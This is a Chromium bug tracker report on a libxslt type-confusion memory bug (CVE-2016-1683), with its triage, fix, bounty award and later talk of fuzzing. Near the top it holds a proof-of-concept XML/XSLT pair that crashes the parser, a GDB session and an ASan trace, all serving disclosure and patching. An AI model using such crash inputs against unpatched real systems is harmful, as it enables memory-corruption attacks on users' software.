Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 583156 Security: Type confusion and UAF in libxslt
Starred by 2 users Reported by nicolas....@agarri.fr, Feb 2 2016 Back to list
Status: Fixed
Owner:
Closed: Apr 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

VULNERABILITY DETAILS

Apparent type confusion in libxslt, leading to heap UAF
I don't understand what is really going on...

VERSION

Chrome Version: release+asan+symbolized v371829
Operating System: Ubuntu x64

REPRODUCTION CASE

Live PoC: http://nicob.net/chrome-Ezeil0hi/Bug-1/NumberFormatGetMultipleLevel.xml

# XML

<?xml-stylesheet type="text/xsl" href="NumberFormatGetMultipleLevel.xsl"?>
<top xmlns:a="AAAA" xmlns:b="BBBB" xmlns:c="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC">
<foo/>
<bar/>
</top>

# XSLT

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:template match="*/*">
  <xsl:for-each select="namespace::*">
   <xsl:number/>
  </xsl:for-each>
 </xsl:template>
</xsl:stylesheet>

ADDITIONAL INFORMATION

Chrome stack-trace is attached. The following GDB session (using CLI xsltproc) shows the type confusion in effect:

(gdb) b xsltNumberFormatGetMultipleLevel
(gdb) r
(gdb) c
(gdb) p *node
$2 = {
  _private = 0x60180000b440,
  type = XML_NAMESPACE_DECL,
  name = 0x600800009310 'C' <repeats 39 times>,
  children = 0x60040000c390,
  last = 0x0,
  parent = 0x0,
  next = 0x2ffffff00000002,
  prev = 0xb00000100000025,
  doc = 0x772f2f3a70747468,
  ns = 0x726f2e33772e7777,
  content = 0x39312f4c4d582f67 <error: Cannot access memory at address 0x39312f4c4d582f67>,
  properties = 0x73656d616e2f3839,
  nsDef = 0x65636170,
  psvi = 0x0,
  line = 2,
  extra = 0
}
(gdb) c
(gdb) p *node
$3 = {
  _private = 0x60180000b440,
  type = XML_NAMESPACE_DECL,
  name = 0x60040000c370 "BBBB",
  children = 0x60040000c350,
  last = 0x0,
  parent = 0x0,
  next = 0x2ffffff00000002,
  prev = 0xb00000100000028,
  doc = 0x4343434343434343,
  ns = 0x4343434343434343,
  content = 0x4343434343434343 <error: Cannot access memory at address 0x4343434343434343>,
  properties = 0x4343434343434343,
  nsDef = 0x43434343434343,
  psvi = 0x0,
  line = 2,
  extra = 0
}
(gdb) c
(gdb) c
==3024== ERROR: AddressSanitizer: heap-use-after-free on address 0x600800009198 at pc 0x7ffff4bf4be2 bp 0x7fffffff7550 sp 0x7fffffff7548
READ of size 8 at 0x600800009198 thread T0
    #0 0x7ffff4bf4be1 in xsltNumberFormatGetMultipleLevel /home/x/libxslt-1.1.28/libxslt/numbers.c:662
    #1 0x7ffff4bf69d7 in xsltNumberFormat /home/x/libxslt-1.1.28/libxslt/numbers.c:794
    #2 0x7ffff4c0e04f in xsltNumber /home/x/libxslt-1.1.28/libxslt/transform.c:4599
    #3 0x7ffff4c0eaa3 in xsltApplySequenceConstructor /home/x/libxslt-1.1.28/libxslt/transform.c:2647
    #4 0x7ffff4c129ac in xsltForEach /home/x/libxslt-1.1.28/libxslt/transform.c:5738
 
xsltNumberFormatGetMultipleLevel-UAF.txt
24.0 KB View Download
Project Member Comment 1 by clusterf...@chromium.org, Feb 2 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5309201817010176
Project Member Comment 2 by clusterf...@chromium.org, Feb 2 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6712313094078464
Cc: aizatsky@chromium.org scottmg@chromium.org mbarbe...@chromium.org och...@chromium.org dominicc@chromium.org infe...@chromium.org kcc@chromium.org
Labels: Cr-Blink-XML Security_Severity-Medium M-49 Pri-1 Security_Impact-Stable OS-All reward-topanel
Owner: fmalita@chromium.org
Status: Assigned
fmalita@, I saw that you did some fixes related to libxlst previously. Could you please take a look here or suggest any other owner?
Cc: -scottmg@chromium.org fmalita@chromium.org
Owner: scottmg@chromium.org
If I touched libxslt it must have been long ago, as I have no recollection :)

Reassigning to listed libxslt owner for triage.
Maybe that veillard@gmail.com (libxslt author) should be cc'ed...
Comment 6 by och...@chromium.org, Feb 23 2016
Ping. any updates here? Note that the crash in #c1 did reproduce on CF, but wasn't marked as "Reproducible" because of the flakiness and as a result it did not get added as a comment here.
Comment 7 by mmoroz@google.com, Mar 3 2016
Cc: ddkil...@apple.com
Cc: scottmg@chromium.org
Owner: dominicc@chromium.org
Comment 9 by ddkil...@apple.com, Mar 5 2016
This reproduces on upstream trunk libxslt (fc1ff481fd01e9a65a921c542fed68d8c965e8a3).

This bug was reported nearly 50 days... Why not adding libxslt maintainer to the thread (cf comment 5)?
Cc: veill...@gmail.com
CC'ing veillard@gmail.com upon request from the reporter.
Cc: wellnho...@aevum.de
+wellnhofer@aevum.de, another libxslt maintainer
Fixed with the following commit:

https://git.gnome.org/browse/libxslt/commit/?id=d182d8f6ba3071503d96ce17395c9d55871f0242

The root cause of this bug is a terrible hack in libxml2's XPath engine: namespace nodes are actually an xmlNs, not an xmlNode. This resulted in a out-of-bounds heap access (not a UAF). A machine word beyond the end of the xmlNs struct was compared with itself which seems relatively harmless.

But I wouldn't be surprised if similar issues turn up with namespace nodes. If anyone is fuzzing libxslt, it's a good idea to work with XPath expressions like "namespace::*".
@wellnhofer: Thanks for the quick fix!
Status: Started
Brief update: I'm working on rolling this here:

https://codereview.chromium.org/1848793005

Should happen on Monday.
Up for review here: https://codereview.chromium.org/1853083002
Project Member Comment 17 by bugdroid1@chromium.org, Apr 6 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab

commit 96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab
Author: dominicc <dominicc@chromium.org>
Date: Wed Apr 06 00:16:28 2016

Roll libxslt to 891681e3e948f31732229f53cb6db7215f740fc7

BUG= 583156 , 583171 

Review URL: https://codereview.chromium.org/1853083002

Cr-Commit-Position: refs/heads/master@{#385338}

[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/COPYING
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/ChangeLog
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/HACKING
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/MAINTAINERS
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/Makefile.in
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/NEWS
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/NOTES
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/README.chromium
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/README.cvs-commits
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/aclocal.m4
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/compile
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/config.guess
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/config.sub
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/configure
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/configure.in
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/depcomp
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/install-sh
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/Makefile.in
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/crypto.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/date.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/functions.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libexslt/strings.c
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt.doap
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/Makefile.in
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/attributes.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/extensions.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/functions.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/imports.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/keys.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/libxslt.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/namespaces.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/numbers.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/pattern.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/preproc.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/transform.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/variables.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/win32config.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xslt.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltInternals.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltconfig.h
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltconfig.h.in
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltutils.c
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/libxslt/xsltutils.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/COPYING
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/Makefile
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/config.log
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libexslt.pc
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libexslt/Makefile
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libexslt/exsltconfig.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt.pc
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt.spec
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt/Makefile
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/libxslt/xsltwin32config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/linux/stamp-h1
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/ltmain.sh
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/mac/config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/missing
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/win32/Makefile.msvc
[modify] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/win32/config.h
[add] https://crrev.com/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab/third_party/libxslt/win32/runtests.py
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xslt-config.in
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xsltproc/Makefile.am
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xsltproc/testThreads.c
[delete] https://crrev.com/5d32c4d7ac9cd3e4a45a5cc1fc547103b66816c7/third_party/libxslt/xsltproc/xsltproc.c

Status: Fixed
Project Member Comment 19 by clusterf...@chromium.org, Apr 6 2016
Labels: -Restrict-View-SecurityTeam Merge-Triage M-51 M-50 Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

Your fix is very close to the branch point. After the branch happens, please make sure to check if your fix is in.

- Your friendly ClusterFuzz
Labels: -Merge-Triage Merge-Requested
Hmm, clusterfuzz y u no verify this?
Project Member Comment 21 by sheriffbot@chromium.org, Apr 14 2016
Labels: -M-49
Comment 22 by tin...@google.com, Apr 21 2016
Merge-Requested label isn't a valid merge request, pls either clean it up or use a valid label. Thanks.
Cc: tinazh@chromium.org
Labels: -Merge-Requested
@tinazh, see Comment 19. Clusterfuzz is telling people to add this label.
Labels: Merge-Request-51
#23: Change from "Merge-Requested" to "Merge-Request-XX, where XX is the Chrome milestone" is in progress.
Comment 25 by tin...@google.com, May 9 2016
Labels: -Merge-Request-51 Merge-Review-51 Hotlist-Merge-Review
[Automated comment] Commit may have occurred before M51 branch point (4/8/2016), needs manual review.
Labels: -Hotlist-Merge-review -Merge-Review-51 merge-na Release-0-M51
...and it's already in M51. Updating labels.
Comment 27 Deleted
Labels: -CVE-2016-1684 CVE-2016-1683
Thanks for reporting this issue. Our reward panel decided to award you $1,000 for this report. Congratulations!

We've credited you in our release notes as "Nicolas Gregoire": https://googlechromereleases.blogspot.com/2016/05/stable-channel-update_25.html - if you'd like to use a different name, please let me know.

Someone from our finance team will be in contact to collect details for payment within 7 days. If that doesn't happen, please either update this bug or contact me at timwillis@.

The CVE-ID for this issue is CVE-2016-1683. Usual boilerplate text below - let me know if you have any questions.

Thanks again for the report!


*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
Comment 29 by kcc@chromium.org, May 26 2016
Is it possible to fuzz libxslt with libFuzzer? 
https://chromium.googlesource.com/chromium/src/+/master/testing/libfuzzer/README.md
Comment 30 by ddkil...@apple.com, May 26 2016
> Is it possible to fuzz libxslt with libFuzzer? 

There are certainly APIs that libxslt exposes that could be used to fuzz libxslt.  The biggest challenge may be managing two separate pools of corpuses for one task:  an XML document corpus and an XSLT document corpus.  I suppose one could also do something where one document type is held fixed (XML), and the other one is managed as a corpus (XSLT), but you'd want to use more than a single XML document to fuzz over a period of time.

Comment 31 by kcc@chromium.org, May 26 2016
I would handle it this way: treat the input byte array as a pair of xml+xslt separated by some 8-byte magic delimiter. If the delimiter is not present (killed by mutations) the input will be rejected right away. 
A minor challenge will be to prepare a rich initial input corpus for such target, 
after that fuzzing should be smooth. 
I don't have enough xslt knowledge to create such target code, anyone?
I tried this. Fuzzer never discovers any valid XSLT even with valid corpus. The xslt format is too brittle and demanding (it has to be valid xml and valid xslt).

The other problem (yet potential) is that xslt processing doesn't have to be linear.
Comment 33 by kcc@chromium.org, May 26 2016
I did not say it's simple. We'll likely need a dictionary for xslt and a very 
good seed corpus. 
Comment 34 by ddkil...@apple.com, May 27 2016
You could start the corpus with built-in (non-error) tests for libxslt.  (Are there any other XSL[T] test suites available as open source or otherwise freely distributed?)

At Google, maybe you could find example URLs (via the search engine index) that return application/xml (or text/xml) content with associated stylesheets, and use that.  For example, here's a web page from OpenGL.org that might serve as an example:  <https://www.opengl.org/sdk/docs/man2/xhtml/gluPerspective.xml>

Nick Wellnhofer has been fuzzing (or knows someone who has been fuzzing) using AFL and ASan as he's been fixing libxslt bugs found by fuzzing.  Maybe there is some information he can share?

Yes, I've been fuzzing libxslt but it's still a work in progress. I can share some ideas on the libxslt mailing list. This private bug report is not the right forum.
Labels: reward-inprocess
Labels: -reward-unpaid
Project Member Comment 38 by sheriffbot@chromium.org, Jul 13 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 39 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 40 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment